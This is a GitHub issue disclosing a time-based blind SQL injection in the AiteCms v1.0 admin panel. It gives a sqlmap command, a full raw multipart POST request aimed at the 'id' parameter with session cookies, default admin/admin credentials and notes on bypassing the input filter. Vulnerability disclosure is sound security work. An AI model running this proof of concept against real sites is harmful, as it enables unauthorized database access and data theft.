Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

AiteCms system background -sql injection vulnerability #3

Open
kk98kk0 opened this issue Mar 20, 2019 · 0 comments
Open

AiteCms system background -sql injection vulnerability #3

kk98kk0 opened this issue Mar 20, 2019 · 0 comments

Comments

@kk98kk0
Copy link
Owner

kk98kk0 commented Mar 20, 2019

Vulnerability description
Test object:

  1. website name: AiteCmsv1.0
  2. web: http://www.aitecms.com/
  3. the download link address: https://pan.baidu.com/s/1qYhUu4G
  4. version: aitecms v1.0.rar compression package decompression

Test time:
March 17, 2019

Description of vulnerability:
AiteCms system background -SQL injection vulnerability. Background management center - online message - remarks, SQL injection vulnerability

Parameter: MULTIPART id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind

POC and verification
Local setup environment:
Install AiteCms guide: http://www.aitecms.com/view-4-1.html

  1. Download https://pan.baidu.com/s/1qYhUu4G
  2. the background to http://127.0.0.1/aitecms/login/, the password is admin/admin
  3. Verify by the following POC verification methods.

Bug:

Parameter: MULTIPART id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind

Verification method:
sqlmap.py -l aitecmsSQLi.txt --batch --random-agent -o --dbms="mysql" -p id -v 4

AitecmsSQLi.txt:

POST /aitecms/login/diy_list.php?action=edit&diyid=1&id=24&do=2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/aitecms/login/diy_list.php?action=edit&diyid=1&id=24
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 1192
Connection: close
Cookie: PHPSESSID=00gdhl9buleop09vajrd4lgkk4; DedeUserID=1; DedeUserID__ckMd5=21e5482050dff3e8; DedeLoginTime=1552802338; DedeLoginTime__ckMd5=d7359ea71f3d0bb2; lastCid=1; lastCid__ckMd5=21e5482050dff3e8; ENV_GOBACK_URL=%2Faitecms%2Flogin%2Fdiy_main.php
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="dopost"

edit
-----------------------------293582696224464
Content-Disposition: form-data; name="id"

24
-----------------------------293582696224464
Content-Disposition: form-data; name="username"

林先生
-----------------------------293582696224464
Content-Disposition: form-data; name="telephone"

18978811188
-----------------------------293582696224464
Content-Disposition: form-data; name="email"

admin@tttt58.com
-----------------------------293582696224464
Content-Disposition: form-data; name="remark"

暂无备注
-----------------------------293582696224464
Content-Disposition: form-data; name="shijian"

1488250285
-----------------------------293582696224464
Content-Disposition: form-data; name="reeee"

reeeeffffffff
-----------------------------293582696224464
Content-Disposition: form-data; name="dede_fields"

username,text;telephone,text;email,text;remark,text;shijian,datetime;reeee,text
-----------------------------293582696224464
Content-Disposition: form-data; name="Submit1"

保存更改
-----------------------------293582696224464--

Vulnerability to prove:
111
2

Reinforcement proposal:
Improve the filter function

Code review:
Local building environment.
\aitecms\include\common.inc.php CheckRequest Filter function line 88 to submit content, imperfect.
3
Call CheckRequest to check $_REQUEST
4
Bypass _RunMagicQuotes checks, bypass addslashes function checks
5

Connect to a Database \wamp\www\aitecms\include\common.inc.php
6
\wamp\www\aitecms\include\dedesql.class.php
7
Bypass SQL security checks
8
Finally, the editor submitted successfully
9

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant